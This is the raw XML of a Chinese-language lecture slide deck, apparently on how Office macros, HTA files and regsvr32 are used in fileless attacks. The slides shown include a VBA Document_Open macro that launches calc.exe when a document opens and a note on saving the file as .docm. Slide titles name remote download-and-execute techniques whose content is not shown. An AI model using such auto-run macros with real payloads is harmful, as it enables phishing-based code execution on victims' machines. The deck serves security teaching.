              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的參數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>放該程式的路徑。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= Shell("C:\Windows\System32\calc.exe") </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>End </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Sub</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421247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746751" y="3068960"/>
            <a:ext cx="2289745" cy="2736304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>存檔要存成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔，這才支援 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語法。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存檔</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://i.imgur.com/f9Hw3U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97460"/>
            <a:ext cx="6351215" cy="416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6517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2364</TotalTime>
  <Words>1515</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>285</Paragraphs>
  <Slides>48</Slides>
  <Notes>0</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波形</vt:lpstr>
      <vt:lpstr>Macro, HTA, and regsvr 32</vt:lpstr>
      <vt:lpstr>巨集(Macro)</vt:lpstr>
      <vt:lpstr>無檔案式威脅透過文件漏洞發動攻擊的過程 [資安趨勢部落格]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>VBA Macro (1)</vt:lpstr>
      <vt:lpstr>VBA Macro (2)</vt:lpstr>
      <vt:lpstr>VBA Macro (3)</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>存檔</vt:lpstr>
      <vt:lpstr>啟用巨集</vt:lpstr>
      <vt:lpstr>Visual Basic for Applications (VBA) [WILL KENTON][MITRE]</vt:lpstr>
      <vt:lpstr>VBA Interpreter [kimep]</vt:lpstr>
      <vt:lpstr>VBA Shell Function [automateexcel]</vt:lpstr>
      <vt:lpstr>Invoke Powershell inside Macro</vt:lpstr>
      <vt:lpstr>Use a Macro to Download and Execute a Remote File</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>One-click Fileless Infection  [Himanshu Anand &amp; Chastine Menrige]</vt:lpstr>
      <vt:lpstr>A Hyperlink to a HTA File in an HTML File</vt:lpstr>
      <vt:lpstr>HTML Application [wikepedia]</vt:lpstr>
      <vt:lpstr>mshta.exe [Đỗ Anh Tú] [cyber one]</vt:lpstr>
      <vt:lpstr>Create a Simple HTA – Step 1 [Alex Hedley]</vt:lpstr>
      <vt:lpstr>Enable HTA on Windows 10 [Biswapriyo]</vt:lpstr>
      <vt:lpstr>Create a Simple HTA – Step 2  [Alex Hedley]</vt:lpstr>
      <vt:lpstr>Create a Simple HTA – Step 3  [Alex Hedley]</vt:lpstr>
      <vt:lpstr>Create a Simple HTA – Step  [Alex Hedley]</vt:lpstr>
      <vt:lpstr>Download and Execute a Remote File Using a HTA File [cyber one]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Things That We Can Do with HTA on the Windows System (1) [Đỗ Anh Tú]</vt:lpstr>
      <vt:lpstr>Things That We Can Do with HTA on the Windows System (2) [Đỗ Anh Tú]</vt:lpstr>
      <vt:lpstr>Things That We Can Do with HTA on the Windows System (3) [Đỗ Anh Tú]</vt:lpstr>
      <vt:lpstr>Things That We Can Do with HTA on the Windows System (4) [Đỗ Anh Tú]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>What Does regsvr32.exe Do?         [Matthew Wetmore]</vt:lpstr>
      <vt:lpstr>What is regsvr32.exe? [file.net]</vt:lpstr>
      <vt:lpstr>regsvr32.ext [Wikipedia]</vt:lpstr>
      <vt:lpstr>Requirements for a DLL Using by regsvr32.ext [Wikipedia]</vt:lpstr>
      <vt:lpstr>The Syntax of the regsvr32.exe Command [Microsoft]</vt:lpstr>
      <vt:lpstr>Example Usage of regsvr32.ext [Wikipedia][OVE]</vt:lpstr>
      <vt:lpstr>Why Use regsvr32.exe to Launch Attacks? [MITRE]</vt:lpstr>
      <vt:lpstr>JS_POWMET (1) [trendMicro]</vt:lpstr>
      <vt:lpstr>JS_POWMET (2) [trendMicro]</vt:lpstr>
      <vt:lpstr>Example (1) [lolbas-project]</vt:lpstr>
      <vt:lpstr>calc.sct[Red Team]</vt:lpstr>
      <vt:lpstr>Example (2) [Red Team]</vt:lpstr>
      <vt:lpstr>Example (3) [Red Team] [Red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很大，你要看一下 - Microsoft Office Phishing  [zeze -ithome]</dc:title>
  <dc:creator>Fu-Hau H</dc:creator>
  <cp:lastModifiedBy>Fu-Hau H</cp:lastModifiedBy>
  <cp:revision>77</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-13T03:26:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-07T07:56:52Z</dcterms:modified>
</cp:coreProperties>
</file>